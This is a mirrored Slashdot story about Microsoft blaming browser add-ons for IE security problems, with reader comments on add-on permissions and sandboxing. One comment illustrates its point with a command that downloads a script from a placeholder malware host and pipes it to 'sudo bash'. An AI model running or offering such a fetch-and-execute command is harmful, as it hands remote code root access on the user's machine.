Slashdot Mirror

← Back to Stories (view on slashdot.org)

Microsoft Blames Add-Ons For Browser Woes

Posted by timothy on from the sounds-semi-reasonable dept.

darthcamaro writes "Running IE and been hacked? Don't blame Microsoft — at least that's what their security types are now arguing. 'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said. 'The browser is becoming a harder target and there are many more browsers. So attackers are targeting add-ons.' This kinda makes sense since whether you're running IE, Firefox, Safari or Chrome you could still be at risk if there is a vulnerability in Flash, PDF, QuickTime or another popular add-on. Or does it?"

12 of 307 comments (clear)

  1. Duh by Drinking+Bleach · · Score: 5, Insightful

    Did anyone seriously believe Microsoft wouldn't try to make Internet Explorer look at least "not as bad as they say"?

    !news

  2. I'll still blame you for everything else. by retech · · Score: 5, Insightful

    Craptacular interface, ignoring standards, sluggish, bloated, lacking usable features... I'm sure I've miss some.

    1. Re:I'll still blame you for everything else. by stewbacca · · Score: 5, Informative

      You forgot the "embedded video frequently doesn't play even though it's a Microsoft codec" bit.

    2. Re:I'll still blame you for everything else. by gmack · · Score: 5, Funny

      That would be an add-on problem.

    3. Re:I'll still blame you for everything else. by Anders · · Score: 5, Funny

      (Yes, I know I am going to get voted down for attempting to defend IE in any capacity...they should really just add -1 Disagree and be done with it)

      Much more needed is "-1, Reverse psychology"

      (runner-up is "+1, your uid is prime")

  3. Permissions by gurps_npc · · Score: 5, Insightful

    And if the Add on's were given far more permission than they actually need? If the browser works right, then the damage a poorly written add on can do should be minimal.

    --
    excitingthingstodo.blogspot.com
    1. Re:Permissions by geirnord · · Score: 5, Insightful

      I second that! Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!?

    2. Re:Permissions by Anonymous Coward · · Score: 5, Informative

      Konqueror runs flash elements and java applets in a separate process with low privileges and high niceness. When flash crashes, it does so by itself.

  4. But remember by dedazo · · Score: 5, Insightful

    If it's Firefox, it's perfectly OK to blame the add-ons.

    Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed.

    And don't get me wrong, FF is a far superior browser to IE any day of the week, but people in crystal rooms shouldn't be hurling stones at others. Or something along those lines.

    --
    Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
  5. Speaking of add-ons by Anonymous Coward · · Score: 5, Insightful

    Would an example of this include the Active X Control you have to install to be able to run Windows Update?

  6. Re:I've always said this. by Sloppy · · Score: 5, Insightful

    The biggest part of internet security is paying attention to where you go.

    I would agree with you, if "going" to a malware site meant

    curl ftp://malwaresite.com/malware.sh | sudo bash

    Normally, that isn't the case, and "going" somewhere poses virtually no risk at all. There's one big exception, and the exception is so big and has so much marketshare, that people confuse that with normality.

    "Going to" a site or "opening" an email, doesn't mean "run someone else's code, and make sure to give it the same level of access that I have with a screwdriver."

    --
    As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
  7. This is too fun by Anonymous Coward · · Score: 5, Funny

    I like the sex analogies; I think this should be a new standard for /.

    Yours has some good points but:

    Surfing the web with IE is like if you were to go to a convenience store to buy eggs and discovered that you had to have sex with the mysterious man behind the counter in order to accomplish this task.

    Sure, you can be safe about it: wear condoms, only go to reputable convenience stores with clean-looking men behind the counter, etc. But isn't part of you wondering why you have to open yourself up in this way?